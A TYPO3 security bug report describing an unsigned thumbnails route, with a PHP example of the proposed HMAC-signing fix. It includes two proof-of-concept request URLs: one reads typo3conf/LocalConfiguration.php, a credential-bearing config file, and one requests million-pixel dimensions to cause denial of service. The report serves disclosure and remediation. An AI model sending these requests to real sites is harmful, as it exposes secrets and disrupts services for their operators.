
Bug #85875

Updated by Oliver Hader over 5 years ago

* information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)
* denial of service (dimensions, basically whole configuration can be arbitrary)

Introduced in https://review.typo3.org/#/c/56765/ - not released yet to 9.4.0 nor 8.7.19

Solution: Add HMAC to all HTTP request parameters.

PoC

h2. Information Disclosure

<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=
</pre>

h2. Denial of Service

<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=
</pre>
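The proposed mitigation ("Add HMAC to all HTTP request parameters") is shown below as an added, self-contained PHP illustration. It is not TYPO3 core code and not the change from the linked review; the function names, the constructed secret and the sample file identifier are assumptions made for this example. The idea is that the server signs every parameter that decides which file is read or how it is processed (`fileIdentifier`, `processingInstructions`), and refuses any request whose recomputed HMAC does not match, so a client cannot swap in another file path or oversized dimensions while keeping the route token.

```php
<?php
declare(strict_types=1);

// Illustrative example (not TYPO3 core code): sign the thumbnail request
// parameters so the server only processes parameter sets it issued itself.

// Constructed secret for this example only. In a real deployment it comes
// from server-side configuration and is never sent to the client.
const THUMBNAIL_HMAC_SECRET = 'constructed-example-secret-do-not-use';

/**
 * Canonical, key-order-independent serialisation of a (nested) parameter
 * array, so the same logical parameters always yield the same HMAC input.
 */
function canonicalize(array $params): string
{
    $normalize = static function (array $data) use (&$normalize): array {
        ksort($data, SORT_STRING);
        foreach ($data as $key => $value) {
            $data[$key] = is_array($value) ? $normalize($value) : (string)$value;
        }
        return $data;
    };
    return json_encode($normalize($params), JSON_UNESCAPED_SLASHES | JSON_THROW_ON_ERROR);
}

/**
 * Server side, when rendering a thumbnail link: build the query string and
 * include an HMAC over every parameter that influences file access or
 * image processing.
 */
function buildSignedThumbnailQuery(string $fileIdentifier, array $processingInstructions): string
{
    $params = [
        'route' => '/thumbnails',
        'fileIdentifier' => $fileIdentifier,
        'processingInstructions' => $processingInstructions,
    ];
    $params['hmac'] = hash_hmac('sha256', canonicalize($params), THUMBNAIL_HMAC_SECRET);
    return http_build_query($params);
}

/**
 * Server side, when handling the request: return the validated parameters,
 * or null if the HMAC is missing or does not match (tampered or forged).
 */
function verifySignedThumbnailRequest(array $query): ?array
{
    if (!isset($query['hmac']) || !is_string($query['hmac'])) {
        return null;
    }
    $received = $query['hmac'];
    unset($query['hmac']);
    $expected = hash_hmac('sha256', canonicalize($query), THUMBNAIL_HMAC_SECRET);
    // Constant-time comparison so the check does not leak the expected value.
    if (!hash_equals($expected, $received)) {
        return null;
    }
    return $query;
}

// --- Demonstration with constructed values ---
$queryString = buildSignedThumbnailQuery(
    '1:/user_upload/example.png',                       // constructed identifier
    ['width' => '64', 'height' => '64c', 'crop' => '']  // same shape as the PoC
);
parse_str($queryString, $legitimate);
var_dump(verifySignedThumbnailRequest($legitimate) !== null); // bool(true): untouched request passes

// A copy with a different file identifier is rejected.
$otherFile = $legitimate;
$otherFile['fileIdentifier'] = 'some/other/file.txt';
var_dump(verifySignedThumbnailRequest($otherFile) === null); // bool(true)

// A copy with changed dimensions is rejected as well.
$otherSize = $legitimate;
$otherSize['processingInstructions']['width'] = '1000000';
var_dump(verifySignedThumbnailRequest($otherSize) === null); // bool(true)
```

Two design points matter for this to hold: the serialisation must be canonical (sorted keys, nested arrays handled the same way on both sides), otherwise a legitimate link could fail verification depending on parameter order; and the comparison must use `hash_equals`, not `==`, so the check runs in constant time. Parameters left outside the HMAC remain attacker-controlled, which is why the report asks for all of them to be covered.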
